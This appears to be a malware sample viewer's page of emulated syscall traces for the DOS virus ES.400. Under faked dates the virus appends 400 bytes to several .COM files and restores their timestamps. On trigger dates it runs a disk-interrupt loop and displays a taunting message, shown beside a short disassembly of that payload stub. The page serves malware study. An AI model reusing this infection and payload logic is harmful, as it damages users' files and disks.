Sample viewer

vx.netlux.org/Virus.DOS.ES.400

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:15:13.72293876Z 42 PC: 12a76 | Get date 0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa0
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa0
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: mov dx, 0x254
0x12a9c: int 0x21
0x12a9e: int 0x20
0x12aa0: mov ah, 0x4a
2018-12-17T22:15:13.725728831Z 74 PC: 12aa7 | Reallocate memory
2018-12-17T22:15:13.727363898Z 26 PC: 12ab1 | Set disk transfer address
2018-12-17T22:15:13.728720858Z 78 PC: 12abc | Find first file
2018-12-17T22:15:13.736258259Z 61 PC: 12afc | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:15:13.742980698Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:15:13.749675675Z 66 PC: 12b5b | Move file pointer
2018-12-17T22:15:13.750987865Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-17T22:15:13.769839452Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:15:13.771213546Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:15:13.777853941Z 87 PC: 12ade | Get or set file date and time
2018-12-17T22:15:13.780107303Z 62 PC: 12ae2 | Close file
2018-12-17T22:15:13.788903094Z 79 PC: 12abc | Find next file
2018-12-17T22:15:13.792342587Z 61 PC: 12afc | Open file (Filename = 'PRINT.COM')
2018-12-17T22:15:13.799776285Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:15:13.806550575Z 66 PC: 12b5b | Move file pointer
2018-12-17T22:15:13.808011851Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-17T22:15:13.811308245Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:15:13.812721154Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:15:13.815359516Z 87 PC: 12ade | Get or set file date and time
2018-12-17T22:15:13.818071387Z 62 PC: 12ae2 | Close file
2018-12-17T22:15:13.825580862Z 79 PC: 12abc | Find next file
2018-12-17T22:15:13.82835583Z 61 PC: 12afc | Open file (Filename = 'HELLO.COM')
2018-12-17T22:15:13.835426212Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:15:13.842489972Z 66 PC: 12b5b | Move file pointer
2018-12-17T22:15:13.844437864Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-17T22:15:13.848105563Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:15:13.849435234Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:15:13.85198731Z 87 PC: 12ade | Get or set file date and time
2018-12-17T22:15:13.854015933Z 62 PC: 12ae2 | Close file
2018-12-17T22:15:13.859400484Z 79 PC: 12abc | Find next file
2018-12-17T22:15:13.861571274Z 61 PC: 12afc | Open file (Filename = 'PHANG.COM')
2018-12-17T22:15:13.866799661Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:15:13.871417326Z 66 PC: 12b5b | Move file pointer
2018-12-17T22:15:13.87256585Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-17T22:15:13.874769082Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:15:13.876338434Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:15:13.87819212Z 87 PC: 12ade | Get or set file date and time
2018-12-17T22:15:13.879577521Z 62 PC: 12ae2 | Close file
2018-12-17T22:15:13.884932442Z 79 PC: 12abc | Find next file
2018-12-17T22:15:13.886818814Z 61 PC: 12afc | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:15:13.891078594Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:15:13.895848412Z 66 PC: 12b5b | Move file pointer
2018-12-17T22:15:13.897028586Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-17T22:15:13.898999915Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:15:13.901654906Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:15:13.903700478Z 87 PC: 12ade | Get or set file date and time
2018-12-17T22:15:13.904939178Z 62 PC: 12ae2 | Close file
2018-12-17T22:15:13.910228988Z 79 PC: 12abc | Find next file
2018-12-17T22:15:13.912121705Z 61 PC: 12afc | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:15:13.916548102Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:15:13.921632051Z 66 PC: 12b5b | Move file pointer
2018-12-17T22:15:13.922816436Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-17T22:15:13.934310771Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:15:13.938843121Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:15:13.946326546Z 87 PC: 12ade | Get or set file date and time
2018-12-17T22:15:13.948105885Z 62 PC: 12ae2 | Close file
2018-12-17T22:15:13.957557756Z 79 PC: 12abc | Find next file
2018-12-17T22:15:13.961124414Z 61 PC: 12afc | Open file (Filename = 'PAH.COM')
2018-12-17T22:15:13.967622206Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:15:13.974965092Z 66 PC: 12b5b | Move file pointer
2018-12-17T22:15:13.976334541Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-17T22:15:13.979023915Z 66 PC: 12b72 | Move file pointer
2018-12-17T22:15:13.980670292Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:15:13.983492459Z 87 PC: 12ade | Get or set file date and time
2018-12-17T22:15:13.984864901Z 62 PC: 12ae2 | Close file
2018-12-17T22:15:13.992067222Z 79 PC: 12abc | Find next file
2018-12-17T22:15:13.995047786Z 61 PC: 12afc | Open file (Filename = 'TEST.COM')
2018-12-17T22:15:14.001271038Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:15:14.004372197Z 62 PC: 12ae2 | Close file
2018-12-17T22:15:14.006254917Z 79 PC: 12abc | Find next file
2018-12-17T22:15:14.008938727Z 26 PC: 12ac5 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2804,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:30.471484306Z 42 PC: 12a76 | Get date 0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa0
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa0
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: mov dx, 0x254
0x12a9c: int 0x21
0x12a9e: int 0x20
0x12aa0: mov ah, 0x4a
2018-12-25T11:46:30.474584151Z 74 PC: 12aa7 | Reallocate memory
2018-12-25T11:46:30.476173548Z 26 PC: 12ab1 | Set disk transfer address
2018-12-25T11:46:30.477289949Z 78 PC: 12abc | Find first file
2018-12-25T11:46:30.484186492Z 61 PC: 12afc | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:30.4923182Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:46:30.499813272Z 66 PC: 12b5b | Move file pointer
2018-12-25T11:46:30.501032032Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-25T11:46:30.516611657Z 66 PC: 12b72 | Move file pointer
2018-12-25T11:46:30.518490651Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:46:30.527449308Z 87 PC: 12ade | Get or set file date and time
2018-12-25T11:46:30.531262083Z 62 PC: 12ae2 | Close file
2018-12-25T11:46:30.53849149Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:30.541201632Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:30.547677782Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:30.554080758Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:30.555519407Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:30.559317145Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:30.560792322Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:30.563301298Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:30.564863129Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:30.572755823Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:30.575749234Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:30.58206396Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:30.604788513Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:30.606355766Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:30.608993789Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:30.611673514Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:30.614517441Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:30.616309411Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:30.624886333Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:30.627844499Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:30.634111364Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:30.640822988Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:30.643171939Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:30.645760695Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:30.647156913Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:30.652393261Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:30.653920298Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:30.661077808Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:30.664884545Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:30.671316933Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:30.677468503Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:30.679668376Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:30.682520813Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:30.684229659Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:30.687264125Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:30.689319774Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:30.696678738Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:30.699642038Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:30.705990724Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:30.712002735Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:30.713342781Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:30.720817642Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:30.722295321Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:30.728561824Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:30.730786911Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:30.738305891Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:30.74122813Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:30.748108666Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:30.754590854Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:30.756324748Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:30.759983425Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:30.76255276Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:30.765279411Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:30.767617073Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:30.774621915Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:30.77753089Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:30.78441084Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:30.788441571Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:30.790195706Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:30.792474247Z 26 PC: 12ac5 | Set disk transfer address

{"DateBased":true,"Day":27,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2804,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:30.808689325Z 42 PC: 12a76 | Get date 0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa0
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa0
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: mov dx, 0x254
0x12a9c: int 0x21
0x12a9e: int 0x20
0x12aa0: mov ah, 0x4a
2018-12-25T11:46:30.8124577Z 9 PC: 12a9e | Display string (String= 'Your drives were on the Estonia... They DIDN'T survive!!! ')

{"DateBased":true,"Day":29,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2804,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:32.274358684Z 42 PC: 12a76 | Get date 0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa0
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa0
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: mov dx, 0x254
0x12a9c: int 0x21
0x12a9e: int 0x20
0x12aa0: mov ah, 0x4a
2018-12-25T11:46:32.277105617Z 74 PC: 12aa7 | Reallocate memory
2018-12-25T11:46:32.278410469Z 26 PC: 12ab1 | Set disk transfer address
2018-12-25T11:46:32.27940283Z 78 PC: 12abc | Find first file
2018-12-25T11:46:32.292166969Z 61 PC: 12afc | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:32.300265126Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:46:32.306730015Z 66 PC: 12b5b | Move file pointer
2018-12-25T11:46:32.308516304Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-25T11:46:32.323183807Z 66 PC: 12b72 | Move file pointer
2018-12-25T11:46:32.324877927Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:46:32.331524229Z 87 PC: 12ade | Get or set file date and time
2018-12-25T11:46:32.334184021Z 62 PC: 12ae2 | Close file
2018-12-25T11:46:32.341936876Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.344959316Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.351831766Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.359759465Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.361347302Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.364581134Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.366742274Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.369305916Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.370789301Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.379271372Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.382342883Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.389022899Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.396929445Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.398354342Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.40121511Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.403814288Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.407023331Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.408818706Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.417450399Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.420479988Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.427091521Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.434412456Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.435736145Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.438144846Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.439528534Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.442594798Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.443969437Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.451500987Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.454943708Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.461307211Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.467771123Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.470118429Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.472736855Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.474037252Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.477480763Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.478889628Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.486064426Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.489270534Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.496082428Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.502935787Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.505453746Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.513939448Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.51515435Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.522410789Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.524079248Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.531728292Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.534712859Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.542364995Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.548977747Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.550317839Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.553790621Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.555228551Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.557864072Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.560834329Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.565647555Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.567436397Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.572215948Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.573958393Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.575129348Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.577262575Z 26 PC: 12ac5 | Set disk transfer address

{"DateBased":true,"Day":27,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2804,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:32.295570258Z 42 PC: 12a76 | Get date 0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa0
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa0
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: mov dx, 0x254
0x12a9c: int 0x21
0x12a9e: int 0x20
0x12aa0: mov ah, 0x4a
2018-12-25T11:46:32.299126064Z 9 PC: 12a9e | Display string (String= 'Your drives were on the Estonia... They DIDN'T survive!!! ')

{"DateBased":true,"Day":29,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2804,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:32.541828071Z 42 PC: 12a76 | Get date 0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa0
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa0
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: mov dx, 0x254
0x12a9c: int 0x21
0x12a9e: int 0x20
0x12aa0: mov ah, 0x4a
2018-12-25T11:46:32.545170935Z 74 PC: 12aa7 | Reallocate memory
2018-12-25T11:46:32.548515652Z 26 PC: 12ab1 | Set disk transfer address
2018-12-25T11:46:32.54981277Z 78 PC: 12abc | Find first file
2018-12-25T11:46:32.557622244Z 61 PC: 12afc | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:32.565843583Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:46:32.573845667Z 66 PC: 12b5b | Move file pointer
2018-12-25T11:46:32.575925718Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-25T11:46:32.596783723Z 66 PC: 12b72 | Move file pointer
2018-12-25T11:46:32.598487299Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:46:32.605945148Z 87 PC: 12ade | Get or set file date and time
2018-12-25T11:46:32.609146095Z 62 PC: 12ae2 | Close file
2018-12-25T11:46:32.6313124Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.634399604Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.642916593Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.650480151Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.652016018Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.655437647Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.657628546Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.661264158Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.665067757Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.677702411Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.68153241Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.692243508Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.705106726Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.707081908Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.711409972Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.715183951Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.718903333Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.720958544Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.732753685Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.736282997Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.745162948Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.753933792Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.757009375Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.760979534Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.762971454Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.7674383Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.76922721Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.891223647Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.896835072Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.905352922Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.913902587Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.917095457Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.921034269Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.92311425Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.927247679Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.929681206Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:33.097103256Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:33.100720449Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:33.108690913Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:33.116092038Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:33.117604781Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:33.429664488Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:33.431299301Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:33.438806662Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:33.442014551Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:33.451073747Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:33.454477023Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:33.462843414Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:33.470734965Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:33.472722101Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:33.47689832Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:33.479166881Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:33.482469949Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:33.484725139Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:33.494443221Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:33.497864183Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:33.505553966Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:33.509950962Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:33.512357383Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:33.515435824Z 26 PC: 12ac5 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2804,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:32.565636658Z 42 PC: 12a76 | Get date 0x12a76: cmp dx, 0x91b
0x12a7a: jb 0x12aa0
0x12a7c: cmp dx, 0x91c
0x12a80: ja 0x12aa0
0x12a82: xor al, al
0x12a84: mov cx, 0x19
0x12a87: push cx
0x12a88: mov ah, 2
0x12a8a: xor cx, cx
0x12a8c: xor dh, dh
0x12a8e: mov dl, al
0x12a90: int 0x13
0x12a92: inc al
0x12a94: pop cx
0x12a95: loop 0x12a87
0x12a97: mov ah, 9
0x12a99: mov dx, 0x254
0x12a9c: int 0x21
0x12a9e: int 0x20
0x12aa0: mov ah, 0x4a
2018-12-25T11:46:32.568554971Z 74 PC: 12aa7 | Reallocate memory
2018-12-25T11:46:32.569958537Z 26 PC: 12ab1 | Set disk transfer address
2018-12-25T11:46:32.571015597Z 78 PC: 12abc | Find first file
2018-12-25T11:46:32.580817509Z 61 PC: 12afc | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:32.593982624Z 63 PC: 12b20 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:46:32.60178846Z 66 PC: 12b5b | Move file pointer
2018-12-25T11:46:32.603538544Z 64 PC: 12b66 | Write file or device (Write 400 bytes on handle 5)
2018-12-25T11:46:32.619672817Z 66 PC: 12b72 | Move file pointer
2018-12-25T11:46:32.621483509Z 64 PC: 12b7d | Write file or device (Write 5 bytes on handle 5)
